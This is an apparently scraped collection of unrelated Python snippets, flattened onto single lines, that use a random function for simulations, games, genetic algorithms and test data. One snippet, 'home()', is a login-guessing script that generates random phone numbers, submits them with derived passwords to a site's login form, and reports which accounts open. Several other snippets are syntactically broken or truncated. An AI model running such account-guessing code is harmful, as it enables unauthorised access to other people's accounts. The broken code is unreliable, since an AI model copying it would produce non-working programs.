def metropolis_transfer(self, beta, Box, factor): n = int(self.N * ran()) x = self.r[n][0] y = self.r[n][1] drx = dr * (2 * ran() - 1) dry = dr * (2 * ran() - 1) x_new = x + drx y_new = y + dry if x_new < 0: x_new += Box.L elif x_new > Box.L: x_new -= Box.L if y_new < 0: y_new += Box.L if y_new > Box.L: y_new -= Box.L dE = Box.calculate_energy(n, x_new, y_new) - self.calculate_energy( n, x, y) if dE <= 0: Box.r.append([x_new, y_new]) self.r.pop(n) self.N = len(self.r) elif ran() < factor * m.exp(-beta * dE): Box.r.append([x_new, y_new]) self.r.pop(n) self.N = len(self.r)
def getInput(): global totalDots global insideDots userInput = int(entryPrecision.get()) count = 0 radius = float(((size - 20) / 2)) while count <= userInput: x, y = (ran(10, size - 10), ran(10, size - 10)) dist = ((((radius - x)**2) + ((radius - y)**2))**(1 / 2)) canvas.create_oval(x, y, x, y, width=1, outline='white') count += 1 totalDots += 1 if dist <= radius: insideDots.append(1) canvas.update() canvas.create_oval(10, 10, size - 10, size - 10, width=5, outline='black') canvas.create_oval(10, 10, size - 10, size - 10, width=3, outline='#38d14f') pi = 4 * (len(insideDots) / totalDots) piDisplay = Label(text=pi) piDisplay.pack(side=BOTTOM)
def metropolis_translation(self, beta): n = int(self.N * ran()) x = self.r[n][0] y = self.r[n][1] drx = dr * (2 * ran() - 1) dry = dr * (2 * ran() - 1) x_new = x + drx y_new = y + dry if x_new < 0: x_new += self.L elif x_new > self.L: x_new -= self.L if y_new < 0: y_new += self.L if y_new > self.L: y_new -= self.L dE = self.calculate_energy(n, x_new, y_new) - self.calculate_energy( n, x, y) if dE <= 0: self.r[n][0] = x_new self.r[n][1] = y_new elif ran() < m.exp(-beta * dE): self.r[n][0] = x_new self.r[n][1] = y_new
def gen_str(msh): str = ['' for _ in range(9)] for x in range(8, 3, -1): digit = ran(0, x) while str[digit] != '': digit += 1 str[digit] = msh.pp(ran(0, len(msh) - 1)) return str
def getting_food(snake, box): food = None while food is None: # random position between [Upper Y + 1 , Lower Y - 1], [Left X + 1, Right X - 1] food = [ran(box[0][0] + 1, box[1][0] - 1), ran(box[0][1] + 1, box[1][1] - 1)] if food in snake: food = None return food
def gaussianRand(mu, sigma): """ Two independent uniformly distributed random variables xi1 and xi2 become two independent Gaussian distributed variables Xf and Yf under Box-Müller Transformation. """ xi1, xi2 = ran(), ran() Xf, Yf = sqrt(-2 * log(xi1)) * cos(2 * pi * xi2), sqrt( -2 * log(xi1)) * sin(2 * pi * xi2) return (mu + sigma * Xf)
def addBomb(self, h: int, w: int, b: int): if b > h * w: exit(1) for i in range(b): hran = round(ran() * (h - 1)) wran = round(ran() * (w - 1)) while self.mine[hran][wran]: hran = round(ran() * (h - 1)) wran = round(ran() * (w - 1)) self.mine[hran][wran] = True
def __init__(self, bottom=GROUND_Y, top=0, left=0, right=SCREEN_X): self.color = RED self.r = ran(20, 25) self.right = right self.left = left = top self.bottom = bottom self.x = ran(self.left + self.r, self.right - self.r) self.y = ran( + self.r, self.bottom - self.r) self.v = self.r / 4 self.angle = ran(0, int(2 * pi * 100)) self.vx = self.v * cos(self.angle // 100) self.vy = self.v * sin(self.angle // 100)
def home(): for x in range(300): if s == '010': f = str(ran(101111111, 109999999)) else: if s == '011': f = str(ran(111111111, 119999999)) else: if s == '012': f = str(ran(121111111, 129999999)) else: if s == '015': f = str(ran(151111111, 159999999)) else: exit() login = '******' useragents = [( 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 .Firefox/45.0', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1' )] def Cr(): br = mechanize.Browser() cj = cookielib.LWPCookieJar() br.set_handle_robots(False) br.set_handle_redirect(True) br.set_cookiejar(cj) br.set_handle_equiv(True) br.set_handle_referer(True) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) br.addheaders = [('User-agent', random.choice(useragents))] site = br.select_form(nr=0) br.form['email'] = '0' + f br.form['pass'] = '******' + f sub = br.submit() log = sub.geturl() print(A5thar) print 'Loiding On The Accounts...' '0' + f if log != login and 'login_attempt' not in log: print(Roz) print 'Accounts is Checking' else: print(A7mar) print 'Accounts not checking' Cr()
def A(a1,a2,a3,a,b,c,d,e): aas=[a1,a2,a3] oos=[a,b,c,d,e] choiceA=[] for elem in range(ran(2,7)): choiceA.append([choice(aas),choice(oos)]) return(choiceA)
def RPS: hands = ["R","P","S", ] Win = 0 Los = 0 Tie = 0 print("q to leave") while True: person_rps = input("Witch one? Rock Paper or Scissors(R/P/S)") if person_rps.upper() == "Q": break elif person_rps.upper() in hands: computer_rps = str(hands[ran(1,3)-1]) print(computer_rps) if computer_rps.upper() == person_rps.upper(): print ("Tie") Tie += 1 elif hands[position(hands,computer_rps)-1] == person_rps.upper(): print("Los") Los+ = 1 else: Win += 1 else: print("Cheaters loose") print("Wins : %s, Losses: %s, Ties %s." % (Win Los,Tie))
def noise(): global img, way way = input() way = 'Загруженные фотографии/' + way print('Оцените мощность шумов от 0 до 100') power = int(input()) if power < 0 or power > 100: print('Вы ввели недопустимое значение') menu() img = img = img.convert(mode="RGBA") pixels = img.load() i = 0 while i < img.width: j = 0 while j < img.height: r, g, b, a = pixels[i, j] c = ran(0, round(power * 2.55)) r += c % 255 g += c % 255 b += c % 255 a += c % 255 pixels[i, j] = (r, g, b, a) j = j + 1 i = i + 1
def rockPaperScissors(): com = ran(0, 2) gamerChoice = input('Pick Rock Paper or Scissors: \n') comStr = ['Rock', 'Paper', 'Scissors'] epic = comStr[com] if gamerChoice == epic: print('They Chose {}!'.format(epic)) q = input('Tie \nReplay? y/n: ') if q == 'y': rockPaperScissors() else: quit if gamerChoice == 'Rock': if epic == 'Scissors': q = input('You Win! \nReplay? y/n: ') if q == 'y': rockPaperScissors() else: quit elif epic == 'Paper': print('They Chose {}!'.format(epic)) q = input('You Lose! \nReplay? y/n: ') if q == 'y': rockPaperScissors() else: quit elif gamerChoice == 'Paper': if epic == 'Rock': q = input('You Win! \nReplay? y/n: ') if q == 'y': rockPaperScissors() else: quit elif epic == 'Scissors': print('They Chose {}!'.format(epic)) q = input('You Lose! \nReplay? y/n: ') if q == 'y': rockPaperScissors() else: quit elif gamerChoice == 'Scissors': if epic == 'Rock': print('They Chose {}!'.format(epic)) q = input('You Lose! \nReplay? y/n: ') if q == 'n': rockPaperScissors() else: quit elif epic == 'Paper': q = input('You Win! \nReplay? y/n: ') if q == 'y': rockPaperScissors() else: quit else: q = input('Invalid Choice \n Replay? y/n: ') if q == 'y': rockPaperScissors() else: quit
def encrypt(txt): file = open('').readlines() ls = [] for i in range(len(file)): ls.append(file[i].strip('\n')) txt = list(txt) inpt = [] for i in txt: try: inpt.append(ls.index(i) + 1) except Exception as e: pass txts = [] txtz = [] for i in range(10): txtz.append(ls[ran(0, len(ls) - 1)]) txtv = 0 for i in range(10): if i == 0: txtv = ls.index(txtz[i]) else: txtv += ls.index(txtz[i]) n = txtv total = 0 for ii, i in enumerate(inpt): if ii == 0: total += i else: iss = i if len(str(i)) == 1: iss = '0' + str(iss) total = int(str(total) + str(iss)) total *= n total *= n return [''.join(txtz), total]
def Attack(self): print( + " saldırıyor.") spent_bullets = ran(0, 10) print(str(spent_bullets) + " mermi harcandı") self.bullet_count -= spent_bullets return spent_bullets, self.fight_power
def RPSLSp(): hands = ["R","SP","P","L","S",] Win = 0 Los = 0 Tie = 0 print("q to leave") while True: person_rps = input("Which one? Rock, Paper, Scissors, Lizard, or Spock? (R/P/S/L/SP)") if person_rps.upper() == "Q": break elif person_rps.upper() in hands: computer_rps = str(hands[ran(1,5)-1]) print computer_rps if computer_rps.upper() == person_rps.upper(): print ("Tie") Tie += 1 elif hands[position(hands,computer_rps)-1] == person_rps.upper() or hands[position(hands,computer_rps)-2] == person_rps.upper(): print("Lose") Los += 1 else: Win += 1 print("Win") else: print("Cheaters loose") print("Wins : %s, Losses: %s, Ties %s." % (Win,Los,Tie))
def notgen(n, imei): array = [] physics = list(range(0, n)) for i in physics: check = str(ran(0, 9)) imeic = str(imei + i) + check array.append(imeic) return array
def Ising(S, beta, steps) : for sweep in range(steps) : for i in range(vol) : k = randint(0, vol-1) h = S[nbhr(k)[0]] + S[nbhr(k)[1]] + S[nbhr(k)[2]] + S[nbhr(k)[3]] dE = 2*h*S[k] boltzmann = np.exp(-beta*dE) if ran(0., 1.) < boltzmann : S[k] = -S[k] return S
def genSerial(): dserial = '' now = dserial += str( dserial += str(now.year) dserial += str(now.month) dserial += str(now.second) serial = int(dserial[::-1])+ran(1995,2018) return str(serial)
def Ising(S, beta, steps): for sweep in range(steps): for i in range(vol): k = randint(0, vol - 1) h = sum(S[nbhr(k)[j]] for j in range(4)) dE = 2 * h * S[k] boltzmann = np.exp(-beta * dE) if ran(0., 1.) < boltzmann: S[k] = -S[k] return S
def generaBalaEnemigo(listaEnemigos,listaBalasEnemigos, imgBala): while len(listaEnemigos) > 1: disparo = listaEnemigos[ran(0, len(listaEnemigos))] spriteBala = pygame.sprite.Sprite() spriteBala.image = imgBala spriteBala.rect = imgBala.get_rect() = + disparo.rect.height spriteBala.rect.left = disparo.rect.left + (disparo.rect.width // 2) listaBalasEnemigos.append(spriteBala)
def MCmove(self, beta): ''' This is to execute the Monte Carlo moves using Metropolis algorithm such that detailed balance condition is satisified''' for k in range(vol) : h = sum(config[self.nbhr(k)[j]] for j in range(4)) dE = 2*h*config[k] boltzmann = np.exp(-beta*dE) if ran(0., 1.) < boltzmann : config[k] = -config[k] return config
def selecionaPai(self, somatotal): pai = -1 valor_sorteado = ran() * somatotal soma = 0 i = 0 while i < len(self.populacao) and soma < valor_sorteado: soma += self.populacao[i].nota_avaliacao pai+=1 i+=1 return pai
def DiscreteChoice(events): ''' Events is a list of the form [0,...information...,0]. So that information is the information about the weighting of each event you consider ''' ep = ran() middle = ep*sum(events) index = 1 for index in range(len(events)): left = sum(events[0:index]) right = left + events[index] #sum(events[0:index+1]) if (left < middle <= right) == True: return(index-1)
def mutacao(self, taxa_mutacao): # print ("Antes %s" %self.cromossomo) for i in range (len(self.cromossomo)): if ran() < taxa_mutacao: if self.cromossomo[i] == "1": self.cromossomo[i] = "0" else: self.cromossomo[i] = "1" # print ("Depois %s" %self.cromossomo) return self
def remove(self): # zwraca losowy element if self.is_empty(): raise IndexError("Z pustego i Salomon nie naleje") else: x = ran(self.head, self.tail - 1) item = self.items[x] self.items[x] = self.items[self.head] self.items[self.head] = None self.head = (self.head + 1) % self.n return item
def genPin(): dpin = '' # sp = '-' now = dpin = str(now.microsecond) dpin += str(now.minute) salt = ran(1995,2018) dpin += str(now.hour+salt) #dpin += str(in)) pin = dpin[::-1] return pin
def volume_change_utilities(self, id): dV = self.L2 * ran() * 0.001 V_new = self.L2 + id * dV change = (V_new / self.L2)**(1 / 3) temp = self.r for r in temp: r[0] *= change r[1] *= change return (self.calculate_energy(-1, 0, 0), dV, change)
def calcularPi(): canvas.delete('all') # Variáveis raio = tamanho/2 pontoDentro = 0 pontoTotal = 0 # Círculo circulo = canvas.create_oval(0, 0, tamanho, tamanho, outline='#7d0101', width=2) # Loop inputUsuario = nPontos.get() for i in range(int(inputUsuario)): # Gerar coordenadas coordx = ran(0, tamanho) coordy = ran(0, tamanho) # Mostrar pontos canvas.create_oval(coordx, coordy, coordx, coordy, outline='#bdc1c9', width=2) # Checar onde caiu dist = ((raio - coordx)**2 + (raio - coordy)**2)**0.5 pontoTotal += 1 if dist <= raio: pontoDentro += 1 # Calcular pi pi = 4*pontoDentro/pontoTotal # Exibir valor display.config(text='{:.5f}'.format(pi)) sleep(0.01) canvas.update() canvas.itemconfig(circulo, outline='#75a158')
def __init__(self,X,Y,NAME,TYPE,mobile=True,direccion = "Random", limite0 = -10000, limite1 = -10000,limite2 = 10000, limite3 = 10000): TYPE = int(TYPE) = mobile self.angle = ran(0,360) self._TYPE = TYPE self.direccion = direccion self.dirh = 1 self.dirv = 1 self.limites = [limite0, limite1, limite2, limite3] if TYPE == 1: self.type1() elif TYPE == 2: self.type2() tags = ["Enemy","Wall","Mobile"] self.element(X, Y, NAME, "Enemy", tags, self.surface)
def __init__(self, espacos, valores, limite_espacos, geracao = 0): self.espacos = espacos self.valores = valores self.limite_espacos = limite_espacos self.nota_avaliacao = 0 self.espaco_usado = 0 self.geracao = geracao self.cromossomo = [] #Criando individuo aleatoriamente. NADA DE INTELIGENCIA, AINDA for i in range (len(espacos)): if ran() < 0.5: self.cromossomo.append("0") else: self.cromossomo.append("1")
def main_func(self): os.chdir("/home/jakesyl/Quotes/pyQOTD/src/") response = urlopen('') html = filename = str(strftime("%Y-%m-%d", gmtime())) filename += str(ran(90)) filename += '.md' with open(filename, mode = 'a', encoding = 'utf-8') as a_file: a_file.write(str(html)) gitpush = sp.check_output('git add -A && git pull && git commit -m "daily file" && git push -f', stderr=sp.STDOUT, shell=True) gitpush commands = ["mv " + filename + ' ~/Quotes/QOTD/_posts/', 'cd ~/Quotes/QOTD/ && git add -A', 'cd ~/Quotes/QOTD/ && git commit -m "added new posts"', 'cd ~/Quotes/QOTD/ && git pull', 'cd ~/Quotes/QOTD/ && git push -f', 'cd ~/Quotes/pyQOTD/ && rm -rf ' + filename + ' && git add -A && git pull && git commit -m "added daily file" && echo hi && git push -f && echo done'] for command in commands: gitpush = sp.check_output(command , stderr=sp.STDOUT, shell=True) gitpush
def executeRandom(command, PATH2IMAGES, TIME2WAIT, stop): # Script execution: Random pic = [] while True: array = listdir(PATH2IMAGES) if stop > len(array): stop = len(array) for i in range(stop): pic.append(array.pop(ran(0, len(array) - 1))) array = None for i in range(stop): # print("Pic: >>>"+pic[0]+"<<<") system(command + PATH2IMAGES + renamePic(pic.pop(0))) sleep(TIME2WAIT)
def crossover(self, individuo): ##Calcula o corte (de um ponto) aleatoriamente corte = round(ran() * len(self.cromossomo)) ##Cria os CROMOSSOMOS dos filhos a partir do corte criado filho1 = individuo.cromossomo[0:corte] + self.cromossomo[corte::] filho2 = self.cromossomo[0:corte] + individuo.cromossomo[corte::] ##cria os individuos filho filhos = [Individuo(self.espacos, self.valores, self.limite_espacos, self.geracao + 1), Individuo(self.espacos, self.valores, self.limite_espacos, self.geracao + 1)] ##Necessário setar o cromossomo para esses filhos filhos[0].cromossomo = filho1 filhos[1].cromossomo = filho2 return filhos
def insertData(self): users = list() for x in range(0, 50, 1): users.append((ran(1,5), ran(40, 60), ran(5,10), ran(70401, 70406), self.random_date())) users.append((ran(1,5), ran(0, 20), ran(5,10), ran(70406, 70410), self.random_date())) users.append((ran(1,5), ran(80, 90), ran(5,10), ran(70410, 70415), self.random_date())) self.c.executemany('INSERT INTO "%s" (Type, Amount, Category,zipcode, datetime) VALUES(?,?,?,?, ?)'%self.tableName, users) self.conn.commit() return "success"
# -*- coding: utf-8 -*- """ Created on Wed Aug 31 18:37:48 2016 @author: SRINIVAS """ import winsound from random import randint as ran from random import choice winsound.Beep(6000, 100) a=ran(200,1000) b=ran(200,1000) c=ran(200,1000) d=a=ran(100,500) e=a=ran(200,1000) a1=ran(100,500) a2=ran(100,3000) a3=ran(100,3000) b1=[] choiceA=[] choiceB=[] choiceC=[] def A(a1,a2,a3,a,b,c,d,e): aas=[a1,a2,a3] oos=[a,b,c,d,e] choiceA=[] for elem in range(ran(2,7)): choiceA.append([choice(aas),choice(oos)]) return(choiceA) At=A(a1,a2,a3,a,b,c,d,e)
from sklearn.datasets.samples_generator import make_blobs tablep ="Transaction" countQuery=' SELECT rowid, * FROM "%s"' %tablep deleteQuery=' DELETE FROM "%s" where Amount = 0' %tablep selectAmountQuery=' SELECT AMOUNT FROM "%s"' %tablep conn = sql.connect('History') print("connection successful") c = conn.cursor() #c.execute(countQuery) users = list() for x in range(0, 10, 1): users.append((0, ran(210, 240), "", ran(70401, 70406), "", "")) #c.executemany('INSERT INTO "%s" (Type, Amount, Category,zipcode, date,time) VALUES(?,?,?,?,?,?)'%tablep, users) conn.commit() def insert(type, amount, category, zipcode, date, time): c.execute('INSERT INTO "Transaction" (Type, Amount, Category,zipcode, date,time) VALUES(?,?,?,?,?,?)', type, amount, category, zipcode, date, time) amount=list() for row in c.execute(countQuery): print (row), amount.append(float(row[0])) X=StandardScaler().fit_transform(amount)
def Choice(cdf,x): ''' Inputs: cdf [type = list or vector], x values [type=list or vector]; Output: floating point value of choice ''' ''' Returns the the chosen value (corresponding to the CDF) that are closest to the choice random value (ranging from 0 to 1)''' choice = ran() return interpol(choice,cdf,x,option='linear')
import matplotlib.pyplot as plt import matplotlib.animation as animation L = [(0.25, 0.25), (0.75, 0.25), (0.25, 0.75), (0.75, 0.75)] sigma = 0.15 delta = 0.15 square_x = [0, 1, 1, 0, 0]; square_y = [0, 0, 1, 1, 0] number = 0 fig = plt.figure() ims = [] for iter in range(100): a = choice(L) L.remove(a) b = (a[0] + ran(-delta, delta), a[1] + ran(-delta, delta)) min_dist = min((b[0] - x[0]) ** 2 + (b[1] - x[1]) ** 2 for x in L) box_cond = min(b[0], b[1]) < sigma or max(b[0], b[1]) > 1 - sigma if box_cond or min_dist < 4 * sigma ** 2: L.append(a) else: L.append(b) if iter % 1 == 0: number += 1 plt.axes() for x, y in L: cir = plt.Circle((x, y), radius=sigma, fc='r') plt.gca().add_patch(cir) plt.axis('equal') ims.append((plt.plot(square_x, square_y),))